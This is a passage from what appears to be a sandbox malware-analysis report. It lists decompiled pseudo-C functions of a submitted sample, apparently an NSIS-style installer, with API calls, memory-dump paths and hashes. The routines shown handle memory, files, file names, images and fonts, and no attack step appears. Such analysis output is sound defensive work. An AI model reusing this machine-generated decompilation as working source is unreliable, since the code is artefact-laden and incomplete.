                                                            • GlobalFree.KERNEL32(00000000), ref: 73C320DD
                                                              • Part of subcall function 73C312AF: lstrcpynA.KERNEL32(00000000,?,73C31502,?,73C311C4,-000000A0), ref: 73C312BF
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C32042
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73C3205A
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73C3206B
                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 73C32081
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C32088
                                                              • Part of subcall function 73C31958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,73C320A7,00000000,?), ref: 73C3198A
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
                                                            • String ID:
                                                            • API String ID: 506890080-0
                                                            • Opcode ID: fff02215b856c2c61ef98d6de7215268eba7eb4360f735ec0b033006ca5b5604
                                                            • Instruction ID: fb4f1f0e56d9a7ea952b0e042816662674f425aecbc62a75412af4237562892f
                                                            • Opcode Fuzzy Hash: fff02215b856c2c61ef98d6de7215268eba7eb4360f735ec0b033006ca5b5604
                                                            • Instruction Fuzzy Hash: C841C172505245EFD705FF25D844BEAB7E8FF46300F95822AE849CA18ADB316944CBE3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E004027E8(int __ebx) {
                                                            				CHAR* _t26;
                                                            				void* _t29;
                                                            				long _t37;
                                                            				int _t49;
                                                            				void* _t52;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				void* _t59;
                                                            				void* _t60;
                                                            				void* _t61;
                                                            
                                                            				_t49 = __ebx;
                                                            				_t52 = 0xfffffd66;
                                                            				_t26 = E00402C39(0xfffffff0);
                                                            				_t55 = _t26;
                                                            				 *(_t61 - 0x78) = _t26;
                                                            				if(E00405C56(_t26) == 0) {
                                                            					E00402C39(0xffffffed);
                                                            				}
                                                            				E00405DC5(_t55);
                                                            				_t29 = E00405DEA(_t55, 0x40000000, 2);
                                                            				 *(_t61 + 8) = _t29;
                                                            				if(_t29 != 0xffffffff) {
                                                            					 *(_t61 - 0xc) =  *(_t61 - 0x24);
                                                            					if( *(_t61 - 0x20) != _t49) {
                                                            						_t37 =  *0x452434;
                                                            						 *(_t61 - 0x30) = _t37;
                                                            						_t54 = GlobalAlloc(0x40, _t37);
                                                            						if(_t54 != _t49) {
                                                            							E0040336B(_t49);
                                                            							E00403355(_t54,  *(_t61 - 0x30));
                                                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x20));
                                                            							 *(_t61 - 0x38) = _t59;
                                                            							if(_t59 != _t49) {
                                                            								E00403143( *(_t61 - 0x24), _t49, _t59,  *(_t61 - 0x20));
                                                            								while( *_t59 != _t49) {
                                                            									_t60 = _t59 + 8;
                                                            									 *(_t61 - 0x8c) =  *_t59;
                                                            									E00405DA5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                            									_t59 = _t60 +  *(_t61 - 0x8c);
                                                            								}
                                                            								GlobalFree( *(_t61 - 0x38));
                                                            							}
                                                            							E00405E91( *(_t61 + 8), _t54,  *(_t61 - 0x30));
                                                            							GlobalFree(_t54);
                                                            							 *(_t61 - 0xc) =  *(_t61 - 0xc) | 0xffffffff;
                                                            						}
                                                            					}
                                                            					_t52 = E00403143( *(_t61 - 0xc),  *(_t61 + 8), _t49, _t49);
                                                            					CloseHandle( *(_t61 + 8));
                                                            				}
                                                            				_t56 = 0xfffffff3;
                                                            				if(_t52 < _t49) {
                                                            					_t56 = 0xffffffef;
                                                            					DeleteFileA( *(_t61 - 0x78));
                                                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                            				}
                                                            				_push(_t56);
                                                            				E00401423();
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t61 - 4));
                                                            				return 0;
                                                            			}














                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402849
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402865
                                                            • GlobalFree.KERNEL32(?), ref: 004028A4
                                                            • GlobalFree.KERNEL32(00000000), ref: 004028B7
                                                            • CloseHandle.KERNEL32(?), ref: 004028D3
                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028E6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: a3127964956f8a126563134f11b56d6a7ee8279a476d2f452480084297a57a74
                                                            • Instruction ID: 62dc5015629f04e2a446b0396b5ca5864e91704113ef4cf620f7a35519d741bb
                                                            • Opcode Fuzzy Hash: a3127964956f8a126563134f11b56d6a7ee8279a476d2f452480084297a57a74
                                                            • Instruction Fuzzy Hash: 4B31AD32800128BBDF207FA5DE88D9E7B79BF08324F14423AF454B62D1CB7989419B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E73C31C2B(signed int __edx, char _a8, void* _a16) {
                                                            				char _v8;
                                                            				char _v28;
                                                            				void* _v32;
                                                            				signed int _v36;
                                                            				signed int _v40;
                                                            				void* _t28;
                                                            				char _t31;
                                                            				char _t32;
                                                            				signed int _t33;
                                                            				signed int _t41;
                                                            				signed int _t42;
                                                            				signed int _t43;
                                                            				signed int _t44;
                                                            				signed int _t45;
                                                            				signed int _t46;
                                                            				signed int _t51;
                                                            				void* _t52;
                                                            				void* _t53;
                                                            				void* _t54;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				signed int _t63;
                                                            				char _t67;
                                                            				signed int _t70;
                                                            				signed int _t72;
                                                            				void* _t79;
                                                            				void* _t81;
                                                            				signed int _t83;
                                                            				signed int _t86;
                                                            				void* _t91;
                                                            
                                                            				_t70 = __edx;
                                                            				asm("xorps xmm0, xmm0");
                                                            				 *0x73c35040 = _a8;
                                                            				 *0x73c3503c = _a16;
                                                            				asm("movlpd [esp+0x10], xmm0");
                                                            				_t28 = E73C3152B();
                                                            				_push(_t28);
                                                            				_v32 = _t28;
                                                            				_t72 = E73C31326();
                                                            				_t63 = _t70;
                                                            				_t79 = E73C3152B();
                                                            				_a16 = _t79;
                                                            				_t67 =  *_t79;
                                                            				_t31 = _t67;
                                                            				_a8 = _t31;
                                                            				if(_t67 == 0x7e) {
                                                            					L3:
                                                            					_t68 = _v36;
                                                            					_t83 = _v40;
                                                            					L4:
                                                            					_t32 = _t31;
                                                            					_t91 = _t32 - 0x2f;
                                                            					if(_t91 > 0) {
                                                            						_t33 = _t32 - 0x3c;
                                                            						__eflags = _t33;
                                                            						if(_t33 == 0) {
                                                            							__eflags =  *((char*)(_t79 + 1)) - 0x3c;
                                                            							if( *((char*)(_t79 + 1)) != 0x3c) {
                                                            								__eflags = _t63 - _t68;
                                                            								if(__eflags > 0) {
                                                            									L18:
                                                            									asm("xorps xmm0, xmm0");
                                                            									asm("movlpd [esp+0x10], xmm0");
                                                            									_t72 = _v40;
                                                            									_t63 = _v36;
                                                            									L19:
                                                            									_push( &_v28);
                                                            									_push(_t63);
                                                            									_push(_t72);
                                                            									E73C3144D(_t68);
                                                            									E73C3157E( &_v28);
                                                            									GlobalFree(_v32);
                                                            									return GlobalFree(_t79);
                                                            								}
                                                            								if(__eflags < 0) {
                                                            									L57:
                                                            									_t72 = 1;
                                                            									_t63 = 0;
                                                            									goto L19;
                                                            								}
                                                            								__eflags = _t72 - _t83;
                                                            								if(_t72 >= _t83) {
                                                            									goto L18;
                                                            								}
                                                            								goto L57;
                                                            							}
                                                            							_t70 = _t63;
                                                            							_t68 = _t83;
                                                            							_t41 = E73C33090(_t72, _t83, _t70);
                                                            							L53:
                                                            							_t72 = _t41;
                                                            							_t63 = _t70;
                                                            							goto L19;
                                                            						}
                                                            						_t42 = _t33 - 1;
                                                            						__eflags = _t42;
                                                            						if(_t42 == 0) {
                                                            							__eflags = _t72 - _t83;
                                                            							if(_t72 != _t83) {
                                                            								goto L18;
                                                            							}
                                                            							__eflags = _t63 - _t68;
                                                            							L22:
                                                            							if(__eflags != 0) {
                                                            								goto L18;
                                                            							}
                                                            							goto L57;
                                                            						}
                                                            						_t43 = _t42 - 1;
                                                            						__eflags = _t43;
                                                            						if(_t43 == 0) {
                                                            							__eflags =  *((char*)(_t79 + 1)) - 0x3e;
                                                            							if( *((char*)(_t79 + 1)) != 0x3e) {
                                                            								__eflags = _t63 - _t68;
                                                            								if(__eflags < 0) {
                                                            									goto L18;
                                                            								}
                                                            								if(__eflags > 0) {
                                                            									goto L57;
                                                            								}
                                                            								__eflags = _t72 - _t83;
                                                            								if(_t72 <= _t83) {
                                                            									goto L18;
                                                            								}
                                                            								goto L57;
                                                            							}
                                                            							__eflags =  *((char*)(_t79 + 2)) - 0x3e;
                                                            							_t44 = _t72;
                                                            							_t70 = _t63;
                                                            							_t68 = _t83;
                                                            							if( *((char*)(_t79 + 2)) != 0x3e) {
                                                            								_t41 = E73C330B0(_t44, _t68, _t70);
                                                            							} else {
                                                            								_t41 = E73C330E0(_t44, _t68, _t70);
                                                            							}
                                                            							goto L53;
                                                            						}
                                                            						_t45 = _t43 - 0x20;
                                                            						__eflags = _t45;
                                                            						if(_t45 == 0) {
                                                            							_t72 = _t72 ^ _t83;
                                                            							_t63 = _t63 ^ _t68;
                                                            							goto L19;
                                                            						}
                                                            						_t46 = _t45 - 0x1e;
                                                            						__eflags = _t46;
                                                            						if(_t46 == 0) {
                                                            							__eflags =  *((char*)(_t79 + 1)) - 0x7c;
                                                            							if( *((char*)(_t79 + 1)) != 0x7c) {
                                                            								_t72 = _t72 | _t83;
                                                            								_t63 = _t63 | _t68;
                                                            								goto L19;
                                                            							}
                                                            							__eflags = _t72 | _t63;
                                                            							if((_t72 | _t63) != 0) {
                                                            								goto L57;
                                                            							}
                                                            							L17:
                                                            							__eflags = _t83 | _t68;
                                                            							if((_t83 | _t68) != 0) {
                                                            								goto L57;
                                                            							}
                                                            							goto L18;
                                                            						}
                                                            						__eflags = _t46 == 0;
                                                            						if(_t46 == 0) {
                                                            							_t72 =  !_t72;
                                                            							_t63 =  !_t63;
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            					if(_t91 == 0) {
                                                            						L24:
                                                            						__eflags = _t83 | _t68;
                                                            						if((_t83 | _t68) != 0) {
                                                            							_push(_t68);
                                                            							_push(_t83);
                                                            							_push(_t63);
                                                            							_push(_t72);
                                                            							_t51 = E73C32FB0();
                                                            							_t86 = _t63;
                                                            							_t72 = _t51;
                                                            							_t63 = _t70;
                                                            						} else {
                                                            							asm("xorps xmm0, xmm0");
                                                            							_t68 = _t72;
                                                            							asm("movlpd [esp+0x10], xmm0");
                                                            							_t86 = _t63;
                                                            							_t63 = _v36;
                                                            							_t72 = _v40;
                                                            						}
                                                            						__eflags = _v8 - 0x2f;
                                                            						if(_v8 != 0x2f) {
                                                            							_t72 = _t68;
                                                            							_t63 = _t86;
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            					_t52 = _t32 - 0x21;
                                                            					if(_t52 == 0) {
                                                            						__eflags = _t72 | _t63;
                                                            						goto L22;
                                                            					}
                                                            					_t53 = _t52 - 4;
                                                            					if(_t53 == 0) {
                                                            						goto L24;
                                                            					}
                                                            					_t54 = _t53 - 1;
                                                            					if(_t54 == 0) {
                                                            						__eflags =  *((char*)(_t79 + 1)) - 0x26;
                                                            						if( *((char*)(_t79 + 1)) != 0x26) {
                                                            							_t72 = _t72 & _t83;
                                                            							_t63 = _t63 & _t68;
                                                            							goto L19;
                                                            						}
                                                            						__eflags = _t72 | _t63;
                                                            						if((_t72 | _t63) == 0) {
                                                            							goto L18;
                                                            						}
                                                            						goto L17;
                                                            					}
                                                            					_t55 = _t54 - 4;
                                                            					if(_t55 == 0) {
                                                            						_t41 = E73C32ED0(_t72, _t63, _t83, _t68);
                                                            						goto L53;
                                                            					} else {
                                                            						_t56 = _t55 - 1;
                                                            						if(_t56 == 0) {
                                                            							_t72 = _t72 + _t83;
                                                            							asm("adc ebx, ecx");
                                                            						} else {
                                                            							if(_t56 == 0) {
                                                            								_t72 = _t72 - _t83;
                                                            								asm("sbb ebx, ecx");
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            				}
                                                            				_a8 = _t67;
                                                            				if(_t67 == 0x21) {
                                                            					goto L3;
                                                            				} else {
                                                            					_t81 = E73C3152B();
                                                            					_push(_t81);
                                                            					_t83 = E73C31326();
                                                            					_v40 = _t70;
                                                            					GlobalFree(_t81);
                                                            					_t79 = _a16;
                                                            					_t68 = _v40;
                                                            					_t31 =  *_t79;
                                                            					_a8 = _t31;
                                                            					goto L4;
                                                            				}
                                                            			}

                                                            0x00000000
                                                            0x73c31c82
                                                            0x73c31c87
                                                            0x73c31c89
                                                            0x73c31c91
                                                            0x73c31c93
                                                            0x73c31c97
                                                            0x73c31c9d
                                                            0x73c31ca1
                                                            0x73c31ca5
                                                            0x73c31ca7
                                                            0x00000000
                                                            0x73c31ca7

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: FreeGlobal$__alldvrm
                                                            • String ID: /
                                                            • API String ID: 482422042-2043925204
                                                            • Opcode ID: 734990d7883756d483f89d6cf6aaef45f0806f4adf628cee31855929cec1b8ca
                                                            • Instruction ID: 03189252ffe0b0ab82e4dcadd6881e4d01207493d63aa9d721ea299232752516
                                                            • Opcode Fuzzy Hash: 734990d7883756d483f89d6cf6aaef45f0806f4adf628cee31855929cec1b8ca
                                                            • Instruction Fuzzy Hash: EC510772A093854FE313BE7689C433A7AFAAB8B110FDA052DE142C7244D6A2D8464353
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E73C310C6(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                                                            				signed int _v0;
                                                            				void _t29;
                                                            				void* _t30;
                                                            				void* _t36;
                                                            				void* _t43;
                                                            				intOrPtr _t52;
                                                            				void* _t56;
                                                            				void* _t62;
                                                            				void* _t63;
                                                            				void _t66;
                                                            				void* _t67;
                                                            				void* _t74;
                                                            				signed int _t75;
                                                            				void* _t79;
                                                            				void* _t80;
                                                            				void* _t82;
                                                            				signed int _t83;
                                                            				void* _t85;
                                                            				void _t88;
                                                            				void _t89;
                                                            				void* _t90;
                                                            				void* _t92;
                                                            				void* _t94;
                                                            
                                                            				 *0x73c35040 = _a8;
                                                            				 *0x73c3503c = _a16;
                                                            				 *0x73c35038 = _a12;
                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x73c35014, E73C312F7, _t79, _t82);
                                                            				_t83 =  *0x73c35040 * 0x14;
                                                            				_v0 = _t83;
                                                            				_t90 = E73C3152B();
                                                            				_a8 = _t90;
                                                            				_t80 = _t90;
                                                            				_t66 = _v0;
                                                            				if(_t66 == 0) {
                                                            					L28:
                                                            					return GlobalFree(_t90);
                                                            				}
                                                            				do {
                                                            					_t29 = _t66;
                                                            					_t80 = _t80 + 1;
                                                            					_t94 = _t29 - 0x66;
                                                            					if(_t94 > 0) {
                                                            						_t30 = _t29 - 0x6c;
                                                            						if(_t30 == 0) {
                                                            							L24:
                                                            							_t31 =  *0x73c35010;
                                                            							if( *0x73c35010 != 0) {
                                                            								E73C312FA( *0x73c35038, _t31 + 4, _t83);
                                                            								_t67 =  *0x73c35010;
                                                            								_t92 = _t92 + 0xc;
                                                            								 *0x73c35010 =  *_t67;
                                                            								GlobalFree(_t67);
                                                            							}
                                                            							goto L26;
                                                            						}
                                                            						_t36 = _t30 - 4;
                                                            						if(_t36 == 0) {
                                                            							L15:
                                                            							GlobalFree(E73C3157E(E73C314E2( *_t80 - 0x30)));
                                                            							_t80 = _t80 + 1;
                                                            							goto L26;
                                                            						}
                                                            						_t43 = _t36;
                                                            						if(_t43 == 0) {
                                                            							L13:
                                                            							GlobalFree(E73C315C7( *_t80 - 0x30, E73C3152B()));
                                                            							_t80 = _t80 + 1;
                                                            							L11:
                                                            							_t83 = _v0;
                                                            							goto L26;
                                                            						}
                                                            						L8:
                                                            						if(_t43 != 1) {
                                                            							goto L26;
                                                            						}
                                                            						_t88 = GlobalAlloc(0x40, _t83 + 4);
                                                            						_t11 = _t88 + 4; // 0x4
                                                            						E73C312FA(_t11,  *0x73c35038, _v0);
                                                            						 *_t88 =  *0x73c35010;
                                                            						 *0x73c35010 = _t88;
                                                            						L10:
                                                            						_t92 = _t92 + 0xc;
                                                            						goto L11;
                                                            					}
                                                            					if(_t94 == 0) {
                                                            						_t74 =  *0x73c3503c;
                                                            						_t85 =  *_t74;
                                                            						 *_t74 =  *_t85;
                                                            						_t75 = _v0;
                                                            						_t52 =  *((intOrPtr*)(_t75 + 0xc));
                                                            						_a12 = _t52;
                                                            						if( *((char*)(_t85 + 4)) == 0x1e) {
                                                            							E73C312FA(_t75, _t85 + 6, 0x38);
                                                            							_t75 = _v0;
                                                            							_t92 = _t92 + 0xc;
                                                            							_t52 = _a12;
                                                            						}
                                                            						 *((intOrPtr*)(_t75 + 0xc)) = _t52;
                                                            						GlobalFree(_t85);
                                                            						goto L11;
                                                            					}
                                                            					_t56 = _t29 - 0x46;
                                                            					if(_t56 == 0) {
                                                            						_t89 = GlobalAlloc(0x40,  *0x73c35040 + 8);
                                                            						 *((intOrPtr*)(_t89 + 4)) = 0x1e;
                                                            						_t14 = _t89 + 6; // 0x6
                                                            						E73C312FA(_t14, _v0, 0x38);
                                                            						 *_t89 =  *( *0x73c3503c);
                                                            						 *( *0x73c3503c) = _t89;
                                                            						goto L10;
                                                            					}
                                                            					_t62 = _t56 - 6;
                                                            					if(_t62 == 0) {
                                                            						goto L24;
                                                            					}
                                                            					_t63 = _t62 - 4;
                                                            					if(_t63 == 0) {
                                                            						 *_t80 =  *_t80 + 0xa;
                                                            						goto L15;
                                                            					}
                                                            					_t43 = _t63;
                                                            					if(_t43 == 0) {
                                                            						 *_t80 =  *_t80 + 0xa;
                                                            						goto L13;
                                                            					}
                                                            					goto L8;
                                                            					L26:
                                                            					_t66 =  *_t80;
                                                            				} while (_t66 != 0);
                                                            				_t90 = _a8;
                                                            				goto L28;
                                                            			}



























                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C31163
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C311B0
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C311CD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C311E0
                                                            • GlobalFree.KERNEL32 ref: 73C31249
                                                            • GlobalFree.KERNEL32(?), ref: 73C31297
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C312A8
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 3ba90c4b64897eea29ba3bf8728cb25e59ed8251496d54bf935446d9dc7744b6
                                                            • Instruction ID: 046dca07569c50e2dea95e8f6693e051f026c8d48453250a6c9af6d3359f5689
                                                            • Opcode Fuzzy Hash: 3ba90c4b64897eea29ba3bf8728cb25e59ed8251496d54bf935446d9dc7744b6
                                                            • Instruction Fuzzy Hash: 98519FB65083819FD301EF6AC990BA57BF8FF4A204F554419E58ADB290D733E901CB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406535(CHAR* _a4) {
                                                            				char _t5;
                                                            				char _t7;
                                                            				char* _t15;
                                                            				char* _t16;
                                                            				CHAR* _t17;
                                                            
                                                            				_t17 = _a4;
                                                            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                            					_t17 =  &(_t17[4]);
                                                            				}
                                                            				if( *_t17 != 0 && E00405C56(_t17) != 0) {
                                                            					_t17 =  &(_t17[2]);
                                                            				}
                                                            				_t5 =  *_t17;
                                                            				_t15 = _t17;
                                                            				_t16 = _t17;
                                                            				if(_t5 != 0) {
                                                            					do {
                                                            						if(_t5 > 0x1f &&  *((char*)(E00405C14("*?|<>/\":", _t5))) == 0) {
                                                            							E00405DA5(_t16, _t17, CharNextA(_t17) - _t17);
                                                            							_t16 = CharNextA(_t16);
                                                            						}
                                                            						_t17 = CharNextA(_t17);
                                                            						_t5 =  *_t17;
                                                            					} while (_t5 != 0);
                                                            				}
                                                            				 *_t16 =  *_t16 & 0x00000000;
                                                            				while(1) {
                                                            					_t16 = CharPrevA(_t15, _t16);
                                                            					_t7 =  *_t16;
                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                            						break;
                                                            					}
                                                            					 *_t16 =  *_t16 & 0x00000000;
                                                            					if(_t15 < _t16) {
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				return _t7;
                                                            			}









                                                            APIs
                                                            • CharNextA.USER32(0000000B), ref: 0040658D
                                                            • CharNextA.USER32(0000000B), ref: 0040659A
                                                            • CharNextA.USER32(0000000B), ref: 0040659F
                                                            • CharPrevA.USER32(0000000B,0000000B), ref: 004065AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: *?|<>/":
                                                            • API String ID: 589700163-165019052
                                                            • Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                            • Instruction ID: f1a46c244338e9c327de57877a99ef2f1f2ce6c7380876dc27bda46ebf0462ee
                                                            • Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                            • Instruction Fuzzy Hash: 671134918047903DFB3216386C04B776FC94F9B760F5A007BE4C2722CAC63C5CA6826D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00401D65(void* __ebx, void* __edx) {
                                                            				struct HWND__* _t30;
                                                            				CHAR* _t38;
                                                            				void* _t48;
                                                            				void* _t53;
                                                            				signed int _t55;
                                                            				signed int _t58;
                                                            				long _t61;
                                                            				void* _t65;
                                                            
                                                            				_t53 = __ebx;
                                                            				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                            				} else {
                                                            					E00402C17(2);
                                                            					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                            				}
                                                            				_t55 =  *(_t65 - 0x1c);
                                                            				 *(_t65 + 8) = _t30;
                                                            				_t58 = _t55 & 0x00000004;
                                                            				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                            				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                            				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                            				if((_t55 & 0x00010000) == 0) {
                                                            					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                            				} else {
                                                            					_t38 = E00402C39(0x11);
                                                            				}
                                                            				 *(_t65 - 8) = _t38;
                                                            				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                            				asm("sbb edi, edi");
                                                            				_t61 = LoadImageA( ~_t58 &  *0x452420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                            				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                            				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                            					DeleteObject(_t48);
                                                            				}
                                                            				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                            					_push(_t61);
                                                            					E004061B5();
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t65 - 4));
                                                            				return 0;
                                                            			}












                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: a576bf6efa7c2fb23105444ffa85423c352b0735285158bf1a86dfd814425e5e
                                                            • Instruction ID: e108dfa7ff8bed4c569463ce295f5c853ec5e47b290a4dfb9769ed3a77c2d4ca
                                                            • Opcode Fuzzy Hash: a576bf6efa7c2fb23105444ffa85423c352b0735285158bf1a86dfd814425e5e
                                                            • Instruction Fuzzy Hash: 63213B72E00109AFDF15DFA4DD85AAEBBB5EB48300F24407EF901F62A1DB789941DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E00401E35(intOrPtr __edx) {
                                                            				void* __esi;
                                                            				int _t9;
                                                            				signed char _t15;
                                                            				struct HFONT__* _t18;
                                                            				intOrPtr _t30;
                                                            				struct HDC__* _t31;
                                                            				void* _t33;
                                                            				void* _t35;
                                                            
                                                            				_t30 = __edx;
                                                            				_t31 = GetDC( *(_t35 - 8));
                                                            				_t9 = E00402C17(2);
                                                            				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                            				0x414438->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                            				ReleaseDC( *(_t35 - 8), _t31);
                                                            				 *0x414448 = E00402C17(3);
                                                            				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                            				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                            				 *0x41444f = 1;
                                                            				 *0x41444c = _t15 & 0x00000001;
                                                            				 *0x41444d = _t15 & 0x00000002;
                                                            				 *0x41444e = _t15 & 0x00000004;
